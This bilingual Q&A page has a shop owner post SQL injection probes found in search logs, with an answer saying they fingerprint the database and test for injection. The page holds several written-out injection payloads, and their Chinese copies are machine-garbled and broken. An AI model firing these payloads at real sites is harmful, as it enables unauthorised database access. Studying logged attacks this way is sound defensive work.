商店搜索中的 SQL 注入模式 [英] SQL Injection pattern in store search
问题描述
从今天凌晨开始,我们就开始关注我们电子商务商店中的搜索查询.我了解它的 SQL 注入.我们也在使用参数化查询.所以它没有造成任何伤害.但由于查询的长度,全文搜索需要时间来处理,最终超时和网站挂了一段时间.
Since early morning today, we are getting following search queries in our ecommerce store. I understand its SQL injection. We are also using parameterized query. So it didnt do any harm. but because to the length of the query full text search took time to process and ended up timeout and website hanged for a while.
立即,我将搜索的最大承租人限制为 75,并添加了检测 sql 注入的逻辑并防止它到达 sql server 作为额外的安全.
Immediately, i have restricted maximum charterers for search to 75 and added logic to detect sql injection and prevent it to reach sql server as additional safety.
我们的环境:ASP.Net 电子商务网站具有全文搜索功能的 SQL Server 2012 Express DB.Windows 2012 标准服务器.
Our enviorment: ASP.Net Ecommerce Site SQL Server 2012 Express DB with full text search. Windows 2012 Std Server.
只是想知道搜索者想要了解/研究什么?或者他们只是想挂掉网站?上面提到的修复后可以忽略吗?
搜索词如下.输入型号或墨盒代码"是我们默认的搜索文本框文本.
Search terms are given below. "Enter Model Number or Cartridge Code" is our default search text box text.
输入型号或墨盒代码) AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR)(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) 来自 DUAL) 和 (9170=9170
Enter Model Number or Cartridge Code) AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) FROM DUAL) AND (9170=9170
输入型号或墨盒代码') AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN)(3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND ('KzHP'='KzHP
Enter Model Number or Cartridge Code') AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND ('KzHP'='KzHP
输入型号或墨盒代码%' AND (SELECT 2396 FROM(SELECT COUNT(*),CONCAT(0x7170617a71,(SELECT (CASE WHEN (2396=2396) THEN 1 ELSE 0 END)),0x7177637971,FLOOR(RAN)(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
Enter Model Number or Cartridge Code%' AND (SELECT 2396 FROM(SELECT COUNT(*),CONCAT(0x7170617a71,(SELECT (CASE WHEN (2396=2396) THEN 1 ELSE 0 END)),0x7177637971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
输入型号或墨盒代码%' AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN)(4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND '%'='
Enter Model Number or Cartridge Code%' AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND '%'='
输入型号或墨盒代码') AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT(当 (6442=6442) 然后 1 ELSE 0 结束时的情况))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113))作为数字) AND ('iWJF'='iWJF
Enter Model Number or Cartridge Code') AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND ('iWJF'='iWJF
输入型号或墨盒代码 AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN) (3733)=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))-- ZgIZ
Enter Model Number or Cartridge Code AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))-- ZgIZ
输入型号或墨盒代码) AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (如果 (6442=6442) 然后 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS数字)和(8167=8167
Enter Model Number or Cartridge Code) AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND (8167=8167
输入型号或墨盒代码 AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733)=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))
Enter Model Number or Cartridge Code AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))
输入型号或墨盒代码 AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE)WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) 作为数字)-- CuDa
Enter Model Number or Cartridge Code AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC)-- CuDa
推荐答案
作为 SQL 注入专家,这些似乎只是用于了解 SQL 注入是否存在以及它是哪种 DB 类型的通用查询.您可以看到,在某些情况下,他使用了 CHR,这是 Oracle 的 number-to-char 版本,在其他情况下,他使用了 CHAR,即其他 DB 的函数名称(SQL Server),在另一种情况下,他使用了 INFORMATION_SCHEMA.CHARACTER_SETStable 是 MySQL 中的一个表.他只是发送几个一般查询来查找注入和数据库类型.尽管如此,如果您的网站因此而挂起,除了长度验证之外,您还应该对特殊字符(括号?)执行一些更好的输入验证
As a SQL Injection expert, it seems that these are only generic queries to understand whether a SQL Injection exist, and which DB type is it. You can see that in some cases he used CHR which is the Oracle's version for number-to-char, and in other cases he used CHAR which is other DB's function names (SQL Server), and in another case he addressed the INFORMATION_SCHEMA.CHARACTER_SETS table which is a table in MySQL. He simply send several general queries to find injections and the DB type. Nonetheless if your site hung by this, you should perform some better input validation of special characters (brackets?) in addition to the length validation
这篇关于商店搜索中的 SQL 注入模式的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!